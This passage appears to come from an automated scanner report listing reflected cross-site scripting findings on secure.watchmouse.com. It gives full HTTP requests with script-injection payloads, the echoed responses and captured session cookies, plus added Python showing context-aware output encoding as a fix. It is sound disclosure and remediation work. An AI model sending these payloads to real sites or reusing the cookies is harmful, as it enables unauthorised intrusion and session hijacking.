Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/jquery-1.3.2.min.js401bf"><script>alert(1)</script>ca85781f7bb HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:24 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b57dd52645d220519f177be27d13b328"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/jquery-1.3.2.min.js401bf"><script>alert(1)</script>ca85781f7bb" method="post">
...[SNIP]...

1.198. https://secure.watchmouse.com/assets/js/wm.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 569aa"><script>alert(1)</script>3d0abf01272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets569aa"><script>alert(1)</script>3d0abf01272/js/wm.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e96f6ee5565a21c690aacc16df97fe0f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets569aa"><script>alert(1)</script>3d0abf01272/js/wm.js" method="post">
...[SNIP]...

1.199. https://secure.watchmouse.com/assets/js/wm.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ba"><script>alert(1)</script>7ea63d2b988 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js794ba"><script>alert(1)</script>7ea63d2b988/wm.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b3a9c8061b6d52915f7b6ab000ababde"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js794ba"><script>alert(1)</script>7ea63d2b988/wm.js" method="post">
...[SNIP]...

1.200. https://secure.watchmouse.com/assets/js/wm.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 957fb"><script>alert(1)</script>d7321fa6cfc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/wm.js957fb"><script>alert(1)</script>d7321fa6cfc HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d23e4a757418e0656328295e25750a78"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/wm.js957fb"><script>alert(1)</script>d7321fa6cfc" method="post">
...[SNIP]...

1.201. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9c8"><script>alert(1)</script>21a00d42841 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie5b9c8"><script>alert(1)</script>21a00d42841 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:35 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-f3b63b44c114816c7e7ae76f4e8e81d8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie5b9c8"><script>alert(1)</script>21a00d42841" method="post">
...[SNIP]...

1.202. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e69a'-alert(1)-'7d2c4d52679 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie6e69a'-alert(1)-'7d2c4d52679 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-edd0f2fcb3230f026d41ba9ee307cfa9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?3d071%22%3E%3Cscript%3Ealert(document.cookie6e69a'-alert(1)-'7d2c4d52679');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

1.203. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c356"><script>alert(1)</script>f5dc871f42d was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=19c356"><script>alert(1)</script>f5dc871f42d HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:35 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-c86580fcde56eabcbff98332c59e3c5a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=19c356"><script>alert(1)</script>f5dc871f42d" method="post">
...[SNIP]...

1.204. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3538f'-alert(1)-'680cbdac783 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=13538f'-alert(1)-'680cbdac783 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-9269ea0feae78f4cbfcf18a3e0f821cd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::script%3E03249d204b0=13538f'-alert(1)-'680cbdac783');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...
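The two sinks in 1.203 and 1.204 (the request URI pasted into a double-quoted form action attribute, and into a single-quoted JavaScript string) are the same two that recur in every watchmouse.com entry that follows. The Python below is an added example, not code from the site or from the scanner: it reproduces each sink as the responses show it, beside a version that applies the encoding the context actually needs, and uses Python's own HTML parser to show that the attribute payload no longer produces a second script element. ORIGIN and REF_PREFIX are assumptions taken from the snippets above; the server-side code that builds these strings is not on this page.

```python
"""
Context-aware output encoding for the two sinks this report keeps finding on
secure.watchmouse.com: the request URI echoed into a double-quoted HTML
attribute (<form action="...">) and into a single-quoted JavaScript string
(encodeURIComponent('...')). Added example; this is not the site's code.
The two request targets below are constructed from the probes in 1.203 and 1.207.
"""
import html
import json
from html.parser import HTMLParser

# Constructed sample request targets (path + query) as the scanner sent them.
ATTR_PROBE = '/en/?9c356"><script>alert(1)</script>f5dc871f42d=1'
JS_PROBE = "/en/?868a8'-alert(1)-'f02a060b98b=1"

ORIGIN = "https://secure.watchmouse.com"       # assumed from the form action
REF_PREFIX = "173.193.214.243::0::::"          # assumed fixed prefix seen in vref_string


def vulnerable_form_action(request_uri):
    """Mirrors the observed sink: the request URI is concatenated raw into the attribute."""
    return '<form id="login_form" action="%s%s" method="post">' % (ORIGIN, request_uri)


def vulnerable_vref_string(request_uri):
    """Mirrors the observed sink: the request URI is concatenated raw into a JS string."""
    return "var vref_string = encodeURIComponent('%s%s');" % (REF_PREFIX, request_uri)


def safe_form_action(request_uri):
    """Attribute encoding: &, <, >, " and ' become entities, so the value cannot close the quote."""
    return '<form id="login_form" action="%s%s" method="post">' % (
        ORIGIN, html.escape(request_uri, quote=True))


def js_string_literal(value):
    """Emit `value` as a JavaScript string literal that is safe inside an HTML <script> block.

    json.dumps yields a double-quoted literal with backslash and " escaped and, with the
    default ensure_ascii=True, every non-ASCII character (including U+2028/U+2029) as \\uXXXX.
    The extra replacements keep ', <, > and & out of the output so the literal can neither
    end a single-quoted context nor contain a closing </script>.
    """
    literal = json.dumps(value)
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def safe_vref_string(request_uri):
    """The JS sink with the string emitted as a proper literal instead of pasted between quotes."""
    return "var vref_string = encodeURIComponent(%s);" % js_string_literal(REF_PREFIX + request_uri)


def decode_js_literal(literal):
    """Reverse js_string_literal (JSON escapes are valid JS escapes); proves the round trip."""
    return json.loads(literal)


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """Start tags an HTML parser sees in `markup`; a 'script' here means the attribute was escaped from."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    for label, build in (("vulnerable", vulnerable_form_action), ("fixed", safe_form_action)):
        print(label, "attribute sink ->", tags_in(build(ATTR_PROBE)))
    print("vulnerable JS sink ->", vulnerable_vref_string(JS_PROBE))
    print("fixed JS sink      ->", safe_vref_string(JS_PROBE))
```

Encoding is the fallback, not the first choice: since the echoed value is nothing more than the current request URI, the cleaner fix is to stop reflecting it (a fixed action path for the login form, and a server-computed referrer string that does not include the raw URI). That is also what the scanner's remediation text for the script context is asking for.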

1.205. https://secure.watchmouse.com/en/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c75f1"><script>alert(1)</script>b3ba854ebba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enc75f1"><script>alert(1)</script>b3ba854ebba/ HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-a679bd02c702e1823560cdfc691d4b44"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enc75f1"><script>alert(1)</script>b3ba854ebba/" method="post">
...[SNIP]...

1.206. https://secure.watchmouse.com/en/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c75ba'-alert(1)-'dcf0f1ccf69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enc75ba'-alert(1)-'dcf0f1ccf69/ HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-c74a2bac85ccc1281e2551f1e0496d92"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::enc75ba'-alert(1)-'dcf0f1ccf69');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

1.207. https://secure.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 868a8'-alert(1)-'f02a060b98b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?868a8'-alert(1)-'f02a060b98b=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-12ff1a5fea619416a5f0454d1931756d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?868a8'-alert(1)-'f02a060b98b=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

1.208. https://secure.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d89"><script>alert(1)</script>fa2ab23bb4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?51d89"><script>alert(1)</script>fa2ab23bb4c=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-c1185e45650eeb9903684867ded578b4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?51d89"><script>alert(1)</script>fa2ab23bb4c=1" method="post">
...[SNIP]...
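Entries 1.203 to 1.208 show that it does not matter which part of the request is tampered with (a parameter value, a parameter name, or a path segment): the whole request URI reaches both sinks. To re-check a finding like this from a saved response instead of re-sending the probe, the Python below is an added example (not the scanner's own logic): it locates the canary, classifies the syntactic context the way the 'Issue detail' text does, and reports whether the quote character needed for the breakout came through unencoded. The three response bodies are constructed from the snippets in 1.207 and 1.208; the encoded variant is hypothetical and shows what an intact-but-harmless echo looks like.

```python
"""
Offline confirmation of a reflected XSS finding from a saved response.
Added example, not part of the scanner or the scanned site: given a response
body and the canary-wrapped probe the scanner sent, find each echo, classify
the syntactic context, and decide whether the characters needed to break out
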